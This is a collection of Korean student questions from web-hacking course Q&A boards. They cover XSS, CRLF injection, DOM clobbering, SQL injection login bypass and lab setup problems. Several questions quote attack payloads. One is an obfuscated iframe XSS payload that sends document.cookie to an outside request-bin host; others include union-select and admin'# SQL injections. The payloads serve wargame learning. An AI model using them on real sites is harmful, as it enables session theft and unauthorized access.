영상 2:20 부분처럼 return address부분에 브레이크가 걸린 코드가 왼쪽 화면에 떠야 하는데 왜 안 뜨는지 잘 모르겠습니다.. bp가 실행돼서 ret전까지 실행은 잘 된 것 같은데 bp 걸린 부분 까지 실행한 코드를 보려면 어떻게 해야할까요?

CRLF Injection 문제에서header=header1 \r\n\r\n &value=<script>alert(1)</script> 로 payload 작성하시던데 그럼 header1 (header 쪽) \r\n\r\n :<script>alert(1)</script>(body 쪽)이렇게 되는 거 아닌가요? 근데 그러면 header 부분에는 header1 만 덩그러니 남는데 이거는 문제없는건지 궁금합니다. (원래 header에는 Content-Type : ~~ 처럼 키-값쌍이 있어야 하지않나요? )그리고 body 부분에는 :가 포함된 <script>문이 되는데 (물론 이번 문제에서는 조건이 충족되서 상관없지만) : <- 없이 그냥 <script>alert(1)</script> 처럼 쓸 수 있도록header=header1&value= \r\n\r\n<script>alert(1)</script> 이렇게 쓰는 거는 안되나요?이 구문으로 쓰면 정답이 안 나오더라구요 

윈도우 7 환경 세팅 후, 인터넷 연결이 되지 않아 글 남깁니다. 호스트 OS 및 게스트 OS 모두 방화벽 비활성화했음에도 연결이 되지 않고 트러블슈팅 시 디폴트 게이트웨이가 유효하지 않다는 메시지가 확인됩니다. ipconfig 하면 디폴트게이트웨이가 확인되는데 어떤 항목을 확인해야 해당 문제를 해결할 수 있을까요? 

강의 04:31부터의 설명을 보면,상단의 window.CONFIG는 if문까지의 로직과 연결되어 있고,HTML에서는 먼저 다음 태그가 등장합니다.<a id="CONFIG"></a> 그리고 이후 설명에서는 아래와 같은 태그를 사용하는 것처럼 보입니다.<a id="CONFIG" name="location" href="http://www.naver.com"></a> 자바스크립트 코드는 다음과 같습니다.window.CONFIG = window.CONFIG || { check: false, location: "http://ssh.knock-on.org:10010/", }; if (window.CONFIG.check !== false) { location.href = window.CONFIG.location; } 여기서 이해가 되지 않는 점은 다음과 같습니다.id="CONFIG"를 가진 <a> 태그가 두 번 등장하는데,그렇다면 결국 아래에 있는 <a id="CONFIG" name="location" href="..."> 태그가앞의 태그를 덮어쓰는 것 아닌가요?만약 그렇다면 window.CONFIG는 최종적으로 아래 태그 기준으로만 동작하게 되고,변수 초기화부터 조건문, 이동까지 모두 동일하게 처리될 것 같은데왜 하나만 있을 때와 두 개가 있을 때 결과 차이가 발생하는지가 이해되지 않습니다.두 경우 모두 같은 id="CONFIG" 태그를 사용하는 것처럼 보이는데,DOM 관점에서 어떤 차이 때문에 동작이 달라지는지 설명이 필요할 것 같습니다.이 부분에서DOM 요소(id="CONFIG")와 window.CONFIG 객체가 어떻게 연결되는지,그리고 태그가 여러 개일 때 어떤 것이 참조되는지가 정확히 이해되지 않아 질문드립니다.

안녕하세요디스코드에 익숙하지 않다보니 이메일 인증시 트랙이 정확히 어떤것인지 모르겠어서 등록이 힘든데 어디서 확인 가능한지 문의 드립니다

설치도 됐고환경설정에서 양방향으로 드래그드롭도 돼있는데 왜 안될까요

인증우회 테스트를 위해 id 에 admin' # pw 에 123 입력했으나 로그인이 안되는 군요 어디가 잘 못 되었을까요 ?

' union select 13,2from (select 1,2,3 union select * from user) as t limit 2,1 #에서 백틱을 왜 사용하는지 이해가 잘 안되는데 알려주실 수 있으실까요?

5:28 쿼리 해상도가 너무 안 좋아서 안보이는데 뭐라고 적혀있는지 알 수 있을까요?

강의 동영상 X, 강의 자료X 없는 파트가 4개가 있어서이수가 안되니 수료도 불가합니다수료증 발급이 필요한데 인프런 고객센터는 연락이 안됩니다.수료증 발급 할 수 있게 빈 파일이라도 올려주세요부탁드립니다

설명 없이 PPT만 띄워주고 마는 강의인가요? 미리보기때도 소리 안나오길래 강의 수가 얼마 안되어서 그런가보다 했는데 결제 후에도 전부 다 소리가 안나오는데 이게 맞나요? 이럼 수강할 필요가 없는데

미션하라고만 하고 내용이 안떠요;;;

XSS 1번 문제 질문 드립니다. 웹 모의해킹에 대한 초보입장에서 시작부터 막히는 상황이라서요.. document.cookie를 통해 cookie값을 알아오기 위해 자신의 웹서버 주소와 포트번호는 어떻게 확인할 수 있나요? cmd>ipconfig를 통해 그냥 IP주소로 입력해도 되는건가요?.. 포트번호는 VM 요청시 받아온 포트번호가 맞을까요?ㅠ

<iframe srcdoc = "<&#x73;cript>fetch('https://mamibjs.request.dreamhack.games/?'+document.cookie)</&#x73;cript>">서버 주소는 드림핵 툴즈 이용했습니다. 스크립트를 위처럼 작성하고 activate admin bot 버튼 누르면 전송이 와야 되는데 안 옵니다. 제가 직접 작성한 글을 클릭해서 하는건 전송이 또 되는데 어드민 봇이 안되는 거 같습니다. 추가로 xss_WAF_3으로도 해봤는데 이것같은 경우는 정상 작동했습니다.

강의 영상을 보면서 따라하기에는 터미널 화면이 너무 작네요. 그냥 눈으로만 볼 수 있을 뿐...따라하면서 배우기는 어려운 강의라고 생각됩니다.

수업 자료가 진도율에 포함이 되지 않습니다.그래서 강의를 모두 수강하였지만 10% 부족으로 나옵니다.수강 완료 후 받을 수 있는 수료증 발급이 필요합니다.

실습 중 백슬래시를 세개 사용하여 로그인 시도 중 로그인이 가능한 것을 확인하였습니다. '\'의 경우 이스케이프 문자로 뒤에 오는 값을 문자열로 표현하기 위함으로 알고 있습니다. 그렇다면 '\\'로 사용하면 문자열로서의 "\"가 될것인데,id 값에 '\\\'를 넣을 경우id='\\\'가 됨으로서 최종 id의 값은 문자열로서의 "\'"가 되는 것으로 생각이 되는데 어떻게 로그인이 가능한 것일까요?

압축파일을 해제했는데,강사님처럼 파이썬 파일(.py)는 없네요.pwntools도 깔았는데...어떻게 하면 되는지 알려주시면 감사하겠습니다~

강의처럼‘ union select 'test','test',null,null,'test',null,null,null,null#라고 치고 검색버튼을 누르면 아무런 결과값이 안 나오는데, cmd창에서 쿼리문 작성시 결과값이 잘 나옵니다. 이유가 뭔지 궁금합니다! ㅜㅜ세팅은 똑같이 따라했습니다

GNS3에 IPS, WAF 구현했는데 해당 기능 써도 될까요?혹시 공부에 지장이 있을까요?